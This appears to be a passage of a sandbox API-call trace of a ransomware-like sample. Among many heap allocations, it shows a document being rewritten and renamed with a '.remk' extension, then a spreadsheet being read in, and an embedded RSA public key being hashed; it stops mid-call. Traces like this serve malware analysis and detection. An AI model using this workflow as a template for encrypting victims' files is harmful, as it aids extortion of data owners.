[0236.100] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc660 | out: hHeap=0x630000) returned 1 [0236.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc678 | out: hHeap=0x630000) returned 1 [0236.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6c0 | out: hHeap=0x630000) returned 1 [0236.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc678 [0236.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0236.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc660 [0236.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc678 | out: hHeap=0x630000) returned 1 [0236.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc660 | out: hHeap=0x630000) returned 1 [0236.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6c0 | out: hHeap=0x630000) returned 1 [0236.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.121] GetCurrentThreadId () returned 0x314 [0236.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5490 [0236.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.142] GetCurrentThreadId () returned 0x314 [0236.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0236.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc660 [0236.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc678 [0236.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.144] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x859c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.192] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.192] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.193] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.193] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.193] CloseHandle (hObject=0x640) returned 1 [0236.194] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\GHrUuVSNZ.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\ghruuvsnz.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\GHrUuVSNZ.ods.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\ghruuvsnz.ods.remk")) returned 1 [0236.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.195] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.197] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x521b9760, ftCreationTime.dwHighDateTime=0x1d5e808, ftLastAccessTime.dwLowDateTime=0xdb5f4020, ftLastAccessTime.dwHighDateTime=0x1d5e0b6, ftLastWriteTime.dwLowDateTime=0xdb5f4020, ftLastWriteTime.dwHighDateTime=0x1d5e0b6, nFileSizeHigh=0x0, nFileSizeLow=0x168bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i2qLmECFmP.xls", cAlternateFileName="I2QLME~1.XLS")) returned 1 [0236.197] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\i2qLmECFmP.xls") returned=".xls" [0236.197] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\i2qLmECFmP.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\i2qlmecfmp.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.198] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=92351) returned 1 [0236.198] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.201] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x16899, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.201] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.204] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x168bf, lpOverlapped=0x0) returned 1 [0236.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.205] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.206] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.206] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.206] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.206] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.207] GetLastError () returned 0x0 [0236.207] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.207] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.207] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.207] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.207] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.208] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc678 | out: hHeap=0x630000) returned 1 [0236.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc690 | out: hHeap=0x630000) returned 1 [0236.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6d8 [0236.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc690 [0236.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc678 [0236.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc690 | out: hHeap=0x630000) returned 1 [0236.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc678 | out: hHeap=0x630000) returned 1 [0236.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.209] GetCurrentThreadId () returned 0x314 [0236.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5520 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.210] GetCurrentThreadId () returned 0x314 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6d8 [0236.211] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc678 [0236.211] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.211] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc690 [0236.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc660 [0236.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6f0 [0236.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6a8 [0236.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc708 [0236.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc6a8 [0236.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6c0 | out: hHeap=0x630000) returned 1 [0236.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc678 | out: hHeap=0x630000) returned 1 [0236.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc678 [0236.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0236.213] HeapFree (in: hHeap=0x630000, 